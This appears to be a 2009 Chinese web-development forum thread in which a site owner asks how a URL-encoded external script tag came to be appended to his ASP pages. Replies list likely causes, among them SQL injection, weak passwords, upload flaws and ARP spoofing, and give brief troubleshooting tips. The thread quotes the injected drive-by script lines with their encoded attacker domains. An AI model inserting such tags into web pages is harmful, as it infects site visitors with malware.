<script src=http://%76%63%63%64%2E%63%6E></script>如何植入的

wxlkeepmoving 2009-08-31 09:34:33
如题,最近我的网站被挂马了。asp+access的网站。查看源文件,在一些源文件的底部</html>的后面多了<script src=http://%76%63%63%64%2E%63%6E></script>的代码。我想知道,黑我网站的人是怎样把这句话写入我的源文件里的呢?有点菜的问题,希望高手不吝赐教。
...全文
190 1 收藏 9
写回复
9 条回复
切换为时间正序
请发表友善的回复…
发表回复
Dogfish 2009-09-01
一打开这个页面,我的电脑就警告。

方法类似
http://blog.csdn.net/dogfish/archive/2009/01/23/3851027.aspx
回复
Dogfish 2009-09-01
sql注入。
回复
coollele 2009-09-01
我前段时遇到黑我网站的人不是写到源代码,而是写入数据库每个字段里,在网上查了查,是SQL注入; 后来通过日志查到他用的是二进制代码通过页面的录入框写入的;
一般的防SQL注入对它不起作用; 最后通过查检录入字符长度来限制;

问题解决.
回复
凡夫与俗子 2009-09-01
先排除局域网中毒
确定是自己网站以后
研究自己网站那些文件做了手脚
然后研究日志,看看有什么蛛丝马迹,顺藤摸瓜
回复
凡夫与俗子 2009-09-01
N种可能。
例如,程序没有过滤传入字符
例如,后台使用弱密码
例如,上传没有过滤危险文件
例如,同服务器站点被黑
例如,同局域网中了arp,(加入源码没有这段,但网页上有,那一般就是这个。)
回复
fxcjy 2009-09-01
有可能是主机漏洞
回复
jypcxgzl 2009-09-01
肯定你的网站哪儿有漏洞被利用了。
回复
wxlkeepmoving 2009-09-01
我的数据库没有被改变。只是我的源代码里多了这么一句<script src=http://%76%63%63%64%2E%63%6E> </script>,这是怎么回事呢?
如我的网页文件的结尾:
</body>
</html>
<script src=http://%77%2E%73%69%79%6F%75%2E%6F%72%67%2E%63%6E></script>。
结尾就是无缘无故的多了这么一句,黑我网站的人是怎么写入的呢?不明白?
回复
hblhshb 2009-09-01
如果有FSO组件权限的话写个循环,给你的所有.asp文件写入段代码是非常简单的
回复
发动态
发帖子
ASP
创建于2007-09-28

2.8w+

社区成员

ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
申请成为版主
社区公告
暂无公告